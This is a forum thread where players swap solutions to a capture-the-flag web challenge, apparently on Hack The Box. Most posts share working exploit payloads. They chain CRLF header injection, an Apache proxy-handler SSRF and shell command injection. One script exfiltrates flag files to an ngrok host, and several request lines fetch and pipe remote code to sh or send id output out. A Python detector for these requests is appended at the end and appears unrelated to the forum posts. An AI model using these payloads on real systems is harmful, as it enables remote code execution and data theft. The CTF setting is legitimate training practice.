Posts: 10
Threads: 1
Joined: Jun 2024
(Mar 24, 2025, 01:51 PM)0x02b375 Wrote: Correct / is a forbidden character, it will fail every time if you use it. You can set up ngrok and do curl%2b--location%2bx.x.x.x.ngrok-free.app|sh with your payload in index.html if you don't have a VPS
Tangent, anyone get Eldoria Panel? I have the solve locally but the bot times out too quickly every time
I have this payload in my index.html:
#!/bin/bash
# Send the flag to your netcat listener
cat /flag* | base64 | curl -X POST --data-binary @- https://25a9-1xxxxx.ngrok-free.app/capture
and I send this request:
/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2520--location%25205632-11xxxxx.ngrok-free.app|sh)%26name=%0d%0a%0d%0a
I got this response:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?result=Succesfully attacked ::1%$(curl --location 5632-110xxxxxxxxx.ngrok-free.app|sh)!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>
but I don't get the flag.
Any suggestions, please?
Posts: 1
Threads: 0
Joined: Mar 2025
(Mar 24, 2025, 01:51 PM)0x02b375 Wrote: Correct / is a forbidden character, it will fail every time if you use it. You can set up ngrok and do curl%2b--location%2bx.x.x.x.ngrok-free.app|sh with your payload in index.html if you don't have a VPS
Tangent, anyone get Eldoria Panel? I have the solve locally but the bot times out too quickly every time
Did you solve it? I spent hours and nothing works :/
Posts: 10
Threads: 1
Joined: Jun 2024
(Mar 24, 2025, 03:17 PM)asciichar Wrote: (Mar 24, 2025, 01:51 PM)0x02b375 Wrote: Correct / is a forbidden character, it will fail every time if you use it. You can set up ngrok and do curl%2b--location%2bx.x.x.x.ngrok-free.app|sh with your payload in index.html if you don't have a VPS
Tangent, anyone get Eldoria Panel? I have the solve locally but the bot times out too quickly every time
Did you solve it? I spent hours and nothing works :/
OK thanks, I get it now
Posts: 14
Threads: 0
Joined: Feb 2025
(Mar 24, 2025, 04:39 PM)mallu93 Wrote: (Mar 24, 2025, 03:17 PM)asciichar Wrote: (Mar 24, 2025, 01:51 PM)0x02b375 Wrote: Correct / is a forbidden character, it will fail every time if you use it. You can set up ngrok and do curl%2b--location%2bx.x.x.x.ngrok-free.app|sh with your payload in index.html if you don't have a VPS
Tangent, anyone get Eldoria Panel? I have the solve locally but the bot times out too quickly every time
Did you solve it? I spent hours and nothing works :/
OK thanks, I get it now
Could you kindly share the payload you used as well as the contents of your index.html? Already set up the ngrok
Posts: 22
Threads: 0
Joined: Oct 2024
Mar 25, 2025, 04:31 AM
(This post was last modified: Mar 25, 2025, 04:32 AM by Mastermind001.)
thanks bro for helping
Posts: 14
Threads: 1
Joined: Apr 2024
Quote: Did you solve it? I spent hours and nothing works :/
You can use the public ftp.dlptest.com to solve this chall
Posts: 4
Threads: 0
Joined: Mar 2024
I'm stuck on Stealth Invasion (question 5). Can anyone help me, please?
Posts: 22
Threads: 0
Joined: Dec 2023
(Mar 24, 2025, 02:39 AM)oyfyic Wrote: (Mar 24, 2025, 01:13 AM)htdgthdsfx Wrote: I'm also getting an error with the webhook. My theory is that the application filters out domain names that don't contain anything. It accepts webhook.site, but not webhook.site/<id webhook>, nor does it accept names that begin with https. I don't know if there's a way to bypass this.
Yeah. Can't seem to get past the filters. Someone who has solved this challenge, kindly tell us what you did because it just ain't working out for us
Did you figure it out?
Posts: 2
Threads: 1
Joined: Feb 2025
Remember that you need a public IP to capture traffic from HTB docker, or use something like request catcher.
curl 'http://localhost:1337/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2b--location%2b172.17.0.1?a=$(id))%26name=%0d%0a%0d%0a'
Posts: 14
Threads: 0
Joined: Feb 2025
(Mar 25, 2025, 01:47 PM)S3d4tion Wrote: Remember that you need a public IP to capture traffic from HTB docker, or use something like request catcher.
curl 'http://localhost:1337/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2b--location%2b172.17.0.1?a=$(id))%26name=%0d%0a%0d%0a'
Thanks. This helped me to solve it. Much appreciated!!
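A defender-side check for the request shape quoted in this thread, as an added example that is not part of any post: it percent-decodes each query parameter repeatedly (the thread shows double-encoded forms) and flags CR/LF followed by a header name, a Content-Type value starting with proxy:, and shell metacharacters. The sample request lines, the finding names and the metacharacter list are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Finding names and the metacharacter list are assumptions made for this example.
CHECKS = {
    "crlf-header-injection": re.compile(r"[\r\n]\s*[A-Za-z-]+:"),
    "proxy-handler-content-type": re.compile(r"content-type:\s*proxy:", re.I),
    "shell-metacharacter": re.compile(r"\$\(|`|[;|]"),
}

# Constructed request lines, modelled on the request shape quoted in the thread.
SAMPLE_REQUESTS = [
    "GET /cgi-bin/attack-domain?target=example.org&name=alice HTTP/1.1",
    "GET /cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0a"
    "Content-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip"
    "%3ftarget=::1%$(id)%26name=%0d%0a%0d%0a HTTP/1.1",
    "GET /cgi-bin/attack-ip?target=::1%2524%2528id%2529&name=bob HTTP/1.1",
]


def fully_decode(value, rounds=3):
    """Percent-decode until stable so double-encoded bytes are also seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(request_line):
    """Return the sorted finding names for one 'METHOD target PROTO' line."""
    target = request_line.split()[1]
    query = target.partition("?")[2]
    findings = set()
    for pair in query.split("&"):
        # '+' means space in a query string; decode the value, not the key.
        raw_value = pair.partition("=")[2].replace("+", " ")
        value = fully_decode(raw_value)
        findings.update(n for n, rx in CHECKS.items() if rx.search(value))
    return sorted(findings)


if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(inspect_request(line) or "clean", "<-", line[:60])
```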